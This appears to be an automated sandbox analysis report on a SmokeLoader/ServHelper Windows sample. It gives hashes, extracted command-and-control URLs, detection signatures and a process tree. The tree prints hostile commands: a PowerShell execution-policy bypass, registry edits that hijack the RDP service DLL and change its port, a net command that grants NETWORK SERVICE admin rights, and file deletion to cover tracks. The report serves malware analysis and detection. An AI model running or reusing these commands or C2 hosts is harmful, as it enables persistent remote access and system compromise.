Analysis
-
max time kernel
151s -
max time network
121s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-12-2021 17:49
Static task
static1
Behavioral task
behavioral1
Sample
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
Resource
win10-en-20211208
General
-
Target
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe
-
Size
298KB
-
MD5
5abf77ca17cd967de8dc06a7c3e6ada3
-
SHA1
354620233a6e3818e3d4f727955dfbf1d3f91e3e
-
SHA256
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680
-
SHA512
2b17bc802ff794a6044fc6347c36ce110afc89b8c92ab60cddb2b5593d885868a826ff4b3c413b006539383f673eeb133187ee87ff37f5b5087909f75c748395
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 92 3696 powershell.exe 94 3696 powershell.exe 95 3696 powershell.exe 97 3696 powershell.exe 99 3696 powershell.exe 101 3696 powershell.exe 103 3696 powershell.exe 105 3696 powershell.exe 107 3696 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
uuterhrAC88.exe363.exepid process 1088 uuterhr 1012 AC88.exe 1444 363.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 2420 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2056 2056 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI77F6.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5az3rxwh.dq5.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jv3og5qf.i0t.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7864.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7885.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7896.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7886.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exeuuterhrdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuterhr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuterhr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI uuterhr -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = af82d12985ecd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 94 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exepid process 2552 b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe 2552 b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 2420 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2420 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 636 636 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exeuuterhrpid process 2552 b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe 1088 uuterhr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 2420 Token: SeCreatePagefilePrivilege 2420 Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeIncreaseQuotaPrivilege 844 powershell.exe Token: SeSecurityPrivilege 844 powershell.exe Token: SeTakeOwnershipPrivilege 844 powershell.exe Token: SeLoadDriverPrivilege 844 powershell.exe Token: SeSystemProfilePrivilege 844 powershell.exe Token: SeSystemtimePrivilege 844 powershell.exe Token: SeProfSingleProcessPrivilege 844 powershell.exe Token: SeIncBasePriorityPrivilege 844 powershell.exe Token: SeCreatePagefilePrivilege 844 powershell.exe Token: SeBackupPrivilege 844 powershell.exe Token: SeRestorePrivilege 844 powershell.exe Token: SeShutdownPrivilege 844 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeSystemEnvironmentPrivilege 844 powershell.exe Token: SeRemoteShutdownPrivilege 844 powershell.exe Token: SeUndockPrivilege 844 powershell.exe Token: SeManageVolumePrivilege 844 powershell.exe Token: 33 844 powershell.exe Token: 34 844 powershell.exe Token: 35 844 powershell.exe Token: 36 844 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeIncreaseQuotaPrivilege 688 powershell.exe Token: SeSecurityPrivilege 688 powershell.exe Token: SeTakeOwnershipPrivilege 688 powershell.exe Token: SeLoadDriverPrivilege 688 powershell.exe Token: SeSystemProfilePrivilege 688 powershell.exe Token: SeSystemtimePrivilege 688 powershell.exe Token: SeProfSingleProcessPrivilege 688 powershell.exe Token: SeIncBasePriorityPrivilege 688 powershell.exe Token: SeCreatePagefilePrivilege 688 powershell.exe Token: SeBackupPrivilege 688 powershell.exe Token: SeRestorePrivilege 688 powershell.exe Token: SeShutdownPrivilege 688 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeSystemEnvironmentPrivilege 688 powershell.exe Token: SeRemoteShutdownPrivilege 688 powershell.exe Token: SeUndockPrivilege 688 powershell.exe Token: SeManageVolumePrivilege 688 powershell.exe Token: 33 688 powershell.exe Token: 34 688 powershell.exe Token: 35 688 powershell.exe Token: 36 688 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeIncreaseQuotaPrivilege 2068 powershell.exe Token: SeSecurityPrivilege 2068 powershell.exe Token: SeTakeOwnershipPrivilege 2068 powershell.exe Token: SeLoadDriverPrivilege 2068 powershell.exe Token: SeSystemProfilePrivilege 2068 powershell.exe Token: SeSystemtimePrivilege 2068 powershell.exe Token: SeProfSingleProcessPrivilege 2068 powershell.exe Token: SeIncBasePriorityPrivilege 2068 powershell.exe Token: SeCreatePagefilePrivilege 2068 powershell.exe Token: SeBackupPrivilege 2068 powershell.exe Token: SeRestorePrivilege 2068 powershell.exe Token: SeShutdownPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeSystemEnvironmentPrivilege 2068 powershell.exe Token: SeRemoteShutdownPrivilege 2068 powershell.exe Token: SeUndockPrivilege 2068 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 2420 2420 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid process 2420 2420 2420 2420 2420 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
363.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2420 wrote to memory of 1012 2420 AC88.exe PID 2420 wrote to memory of 1012 2420 AC88.exe PID 2420 wrote to memory of 1012 2420 AC88.exe PID 2420 wrote to memory of 1444 2420 363.exe PID 2420 wrote to memory of 1444 2420 363.exe PID 1444 wrote to memory of 952 1444 363.exe powershell.exe PID 1444 wrote to memory of 952 1444 363.exe powershell.exe PID 952 wrote to memory of 2004 952 powershell.exe csc.exe PID 952 wrote to memory of 2004 952 powershell.exe csc.exe PID 2004 wrote to memory of 3344 2004 csc.exe cvtres.exe PID 2004 wrote to memory of 3344 2004 csc.exe cvtres.exe PID 952 wrote to memory of 3056 952 powershell.exe csc.exe PID 952 wrote to memory of 3056 952 powershell.exe csc.exe PID 3056 wrote to memory of 2812 3056 csc.exe cvtres.exe PID 3056 wrote to memory of 2812 3056 csc.exe cvtres.exe PID 952 wrote to memory of 844 952 powershell.exe powershell.exe PID 952 wrote to memory of 844 952 powershell.exe powershell.exe PID 952 wrote to memory of 688 952 powershell.exe powershell.exe PID 952 wrote to memory of 688 952 powershell.exe powershell.exe PID 952 wrote to memory of 2068 952 powershell.exe powershell.exe PID 952 wrote to memory of 2068 952 powershell.exe powershell.exe PID 952 wrote to memory of 504 952 powershell.exe reg.exe PID 952 wrote to memory of 504 952 powershell.exe reg.exe PID 952 wrote to memory of 3956 952 powershell.exe reg.exe PID 952 wrote to memory of 3956 952 powershell.exe reg.exe PID 952 wrote to memory of 3000 952 powershell.exe reg.exe PID 952 wrote to memory of 3000 952 powershell.exe reg.exe PID 952 wrote to memory of 3668 952 powershell.exe net.exe PID 952 wrote to memory of 3668 952 powershell.exe net.exe PID 3668 wrote to memory of 876 3668 net.exe net1.exe PID 3668 wrote to memory of 876 3668 net.exe net1.exe PID 952 wrote to memory of 764 952 powershell.exe cmd.exe PID 952 wrote to memory of 764 952 powershell.exe cmd.exe PID 764 wrote to memory of 2924 764 cmd.exe cmd.exe PID 764 wrote to memory of 2924 764 cmd.exe cmd.exe PID 2924 wrote to memory of 1452 2924 cmd.exe net.exe PID 2924 wrote to memory of 1452 2924 cmd.exe net.exe PID 1452 wrote to memory of 1432 1452 net.exe net1.exe PID 1452 wrote to memory of 1432 1452 net.exe net1.exe PID 952 wrote to memory of 3672 952 powershell.exe cmd.exe PID 952 wrote to memory of 3672 952 powershell.exe cmd.exe PID 3672 wrote to memory of 652 3672 cmd.exe cmd.exe PID 3672 wrote to memory of 652 3672 cmd.exe cmd.exe PID 652 wrote to memory of 3480 652 cmd.exe net.exe PID 652 wrote to memory of 3480 652 cmd.exe net.exe PID 3480 wrote to memory of 2372 3480 net.exe net1.exe PID 3480 wrote to memory of 2372 3480 net.exe net1.exe PID 2428 wrote to memory of 2792 2428 cmd.exe net.exe PID 2428 wrote to memory of 2792 2428 cmd.exe net.exe PID 2792 wrote to memory of 3544 2792 net.exe net1.exe PID 2792 wrote to memory of 3544 2792 net.exe net1.exe PID 3816 wrote to memory of 3748 3816 cmd.exe net.exe PID 3816 wrote to memory of 3748 3816 cmd.exe net.exe PID 3748 wrote to memory of 1392 3748 net.exe net1.exe PID 3748 wrote to memory of 1392 3748 net.exe net1.exe PID 688 wrote to memory of 2740 688 cmd.exe net.exe PID 688 wrote to memory of 2740 688 cmd.exe net.exe PID 2740 wrote to memory of 3292 2740 net.exe net1.exe PID 2740 wrote to memory of 3292 2740 net.exe net1.exe PID 2508 wrote to memory of 3996 2508 cmd.exe net.exe PID 2508 wrote to memory of 3996 2508 cmd.exe net.exe PID 3996 wrote to memory of 2280 3996 net.exe net1.exe PID 3996 wrote to memory of 2280 3996 net.exe net1.exe PID 3148 wrote to memory of 1592 3148 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe"C:\Users\Admin\AppData\Local\Temp\b724f357f38ebbc4db95aa17c981097cceb72a05b6f20c83d40ad3d9d9068680.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uuterhrC:\Users\Admin\AppData\Roaming\uuterhr1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AC88.exeC:\Users\Admin\AppData\Local\Temp\AC88.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\363.exeC:\Users\Admin\AppData\Local\Temp\363.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qy0l5zoz\qy0l5zoz.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2300.tmp" "c:\Users\Admin\AppData\Local\Temp\qy0l5zoz\CSC8653EED5F314474E83368F1494FA423E.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\chkm0zwj\chkm0zwj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29F5.tmp" "c:\Users\Admin\AppData\Local\Temp\chkm0zwj\CSCE6E96CA1A4FA4D84B5DBF5FBB9662E26.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
